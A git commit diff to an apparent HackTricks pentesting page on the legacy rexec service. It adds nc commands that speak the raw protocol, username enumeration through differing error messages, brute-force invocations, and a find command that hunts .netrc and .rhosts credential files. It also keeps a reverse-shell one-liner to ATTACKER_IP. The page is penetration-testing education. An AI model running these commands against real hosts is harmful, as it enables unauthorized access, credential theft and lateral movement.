Merge pull request #2071 from HackTricks-wiki/research_update_src_network-services-pentesting_512-pentesting-rexec_20260330_031824

carlospolop · web-flow · commit 43bb15dc0ed0 · 2026-03-30T05:25:38.000+02:00
Research Update Enhanced src/network-services-pentesting/512...
diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -25,6 +25,8 @@ PORT    STATE SERVICE
 3. A final NUL-terminated string with the **command** to execute is sent.
 4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
 
+If the first field is **non-zero**, the server opens a **second TCP connection back to the client** and uses it for stderr. This is useful both for **manual testing** and for **fingerprinting filtering / firewall issues** around the service.
+
 That means you can reproduce the exchange with nothing more than `echo -e` and `nc`:
 
 ```bash
@@ -33,6 +35,15 @@ That means you can reproduce the exchange with nothing more than `echo -e` and `
 
 If the credentials are valid you will receive the output of `id` straight back on the same connection.
 
+If you want to receive stderr on a dedicated listener, ask the server to connect back to you:
+
+```bash
+nc -lvnp 4444
+printf '4444\0user\0password\0id; uname -a\0' | nc <target> 512
+```
+
+Many common implementations (for example GNU `rexecd`) still enforce **16-byte username/password fields** and return **different diagnostic strings** for invalid usernames vs invalid passwords. That matters during enumeration because some targets leak whether the account exists before you start brute forcing.
+
 ### Manual usage with the client
 
 Many Linux distributions still ship the legacy client inside the **inetutils-rexec** / **rsh-client** package:
@@ -43,6 +54,14 @@ rexec -l user -p password <target> "uname -a"
 
 If `-p` is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).
 
+To avoid leaving the password in your shell history / process list, GNU `rexec` also supports reading it from stdin:
+
+```bash
+printf '%s\n' 'password' | rexec -l user -p - <target> "id"
+```
+
+This is **not safer on the network**; it only reduces local exposure on the attacking host.
+
 ---
 ## Enumeration & Brute-forcing
 
@@ -51,8 +70,8 @@ If `-p` is omitted the client will prompt interactively for the password (visibl
 ### Nmap
 
 ```bash
-nmap -p 512 --script rexec-info <target>
-# Discover service banner and test for stdout port mis-configuration
+nmap -sV -p 512 <target>
+# Confirm the classic exec service before credential attacks
 
 nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>
 ```
@@ -65,6 +84,35 @@ hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
 ```
 `hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer .  `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
 
+### Username enumeration through server messages
+
+Some `rexecd` implementations expose distinct errors such as **`Login incorrect.`** vs **`Password incorrect.`**. If you see this behavior, validate usernames first and only then brute force passwords:
+
+```bash
+printf '0\0root\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2
+printf '0\0definitelynotreal\0wrongpass\0id\0' | nc -w 2 <target> 512 | tail -c +2
+```
+
+If the messages differ, build a valid-user list before sending a large password spray.
+
+### Check sibling *r*-services
+
+`rexec` itself uses **password authentication**, unlike `rsh` / `rlogin` trusted-host logic, but in practice they often arrive from the **same legacy package** (`openbsd-inetd`, `inetutils`, vendor UNIX bundles). If TCP 512 is open, immediately check TCP **513** and **514** as well because `.rhosts` / `/etc/hosts.equiv` abuse may offer easier lateral movement:
+
+```bash
+nmap -sV -p 512,513,514 <target>
+```
+
+See also:
+
+{{#ref}}
+pentesting-rsh.md
+{{#endref}}
+
+{{#ref}}
+pentesting-rlogin.md
+{{#endref}}
+
 ### Metasploit
 
 ```
@@ -96,7 +144,10 @@ tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
   ```bash
   rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
   ```
-* Passwords are often stored in **~/.netrc** on other systems; if you compromise one host you may reuse them for lateral movement.
+* Passwords are often stored in **`~/.netrc`** or legacy automation scripts on other systems; if you compromise one host you may reuse them for lateral movement:
+  ```bash
+  find / -xdev \( -name .netrc -o -name netrc -o -iname '*rexec*' -o -path '*/.rhosts' \) 2>/dev/null
+  ```
 
 ---
 ## Hardening / Detection
@@ -111,6 +162,6 @@ tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
 
 ## References
 
+* GNU Inetutils `rexecd` / `rexec` documentation – [https://www.gnu.org/software/inetutils/manual/html_node/rexecd-invocation.html](https://www.gnu.org/software/inetutils/manual/html_node/rexecd-invocation.html)
 * Nmap NSE `rexec-brute` documentation – [https://nmap.org/nsedoc/scripts/rexec-brute.html](https://nmap.org/nsedoc/scripts/rexec-brute.html)
-* Rapid7 Metasploit module `auxiliary/scanner/rservices/rexec_login` – [https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login)
 {{#include ../banners/hacktricks-training.md}}
